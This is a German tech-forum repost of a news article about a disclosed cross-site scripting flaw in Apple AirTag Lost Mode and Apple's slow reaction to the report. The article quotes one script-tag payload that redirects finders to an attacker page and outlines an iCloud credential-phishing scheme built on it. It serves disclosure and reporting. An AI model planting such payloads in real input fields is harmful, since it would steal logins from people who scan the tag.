Quantcast
Aktuelles
Digital Eliteboard - Das Digitale Technik Forum

Registriere dich noch heute kostenlos, um Mitglied zu werden! Sobald du angemeldet bist, kannst du auf unserer Seite aktiv teilnehmen, indem du deine eigenen Themen und Beiträge erstellst und dich über deinen eigenen Posteingang mit anderen Mitgliedern unterhalten kannst! Zudem bekommst du Zutritt zu Bereichen, welche für Gäste verwehrt bleiben

Registriere dich noch heute kostenlos, um Mitglied zu werden! Sobald du angemeldet bist, kannst du auf unserer Seite aktiv teilnehmen, indem du deine eigenen Themen und Beiträge erstellst und dich über deinen eigenen Posteingang mit anderen Mitgliedern unterhalten kannst! Zudem bekommst du Zutritt zu Bereichen, welche für Gäste verwehrt bleiben

Hardware & Software AirTags als Echtwelt-Trojaner: Apple lässt XSS-Lücke über Monate offen

Apple AirTags lassen sich leicht in eine "Waffe" zum Klau von Zugangsdaten oder andere Angriffe über manipulierte Webseiten verwandeln, wie der Sicherheitsforscher Bobby Rauch warnt – der Verloren-Modus der AirTags ist nämlich anfällig für Cross-Site-Scripting (XSS).

Payload statt Telefonnummer​

Besitzer eines AirTag können ihre Kontaktdaten hinterlegen, die ein ehrlicher Finder per NFC aus dem verlorenen Tracker ausliest. Dabei wird er auf eine spezielle URL auf found.apple.com weitergeleitet, wo sich normalerweise Telefonnummer oder E-Mail-Adresse des Besitzers nachsehen lässt.

Statt seiner Telefonnummer kann der Angreifer respektive Besitzer des AirTag beim Einrichten eine Payload wie <script>window.location=’https://10.0.1.137:8000/indexer.html’;var a = ‘’;</script> in das Telefonnummer-Feld von Apples "Wo ist?"-Appeinfügen, erklärt Rauch. Der Finder des AirTag wird durch das NFC-Scannen dann von found.apple.com unmittelbar auf eine manipulierte Webseite weitergeleitet.
Dafür lasse sich etwa Apples Webseite klonen und die Zugangsdaten für iCloud unter dem Vorwand abgreifen, der Finder müsse diese zur Kontaktaufnahme eingeben. Auch andere XSS-Exploits wie Session Hijacking und Clickjacking und unzählige weitere Angriffsmethoden seien so möglich, erläutert der Sicherheitsforscher. In Verbindung mit weiteren Schwachstellen etwa in Apples Safari-Unterbau WebKit könnte sich so ein Opfer auch gezielt auf manipulierte Webinhalte locken lassen, die Schadcode auf dem Gerät einschleusen.



Apple will Lücke schließen​

Dies mache die AirTags zu einem billigen und wohl sehr effektiven Echtwelt-Trojaner, erläuterte Rauch gegenüber Krebs on Security. Er habe die Schwachstelle schon im Juni an Apple gemeldet und habe über die letzten drei Monate lediglich das Feedback erhalten, die Lücke werde noch untersucht. Erst Ende letzter Woche habe ihm Apple mitgeteilt, die Schwachstelle solle mit einem kommenden Update behoben werden.
Auf seine Nachfragen zu einem Zeitplan für den Fix und ob die Lücke sich für eine Auszahlung im Rahmen von Apples Bug-Bounty-Programm qualifiziere, sei keine Reaktion erfolgt, so der Sicherheitsforscher – deshalb habe er sich nun zur Veröffentlichung entschieden. Ihm sei klar, dass der AirTag-Bug wohl nicht Apples dringendstes Sicherheitsproblem ist, doch sei die Lücke auch nicht schwer zu schließen, so Rauch. Apple versuche wohl noch herauszufinden, wie das so überhaupt durchrutschen konnte.
Quelle: heise
 
Zurück
Oben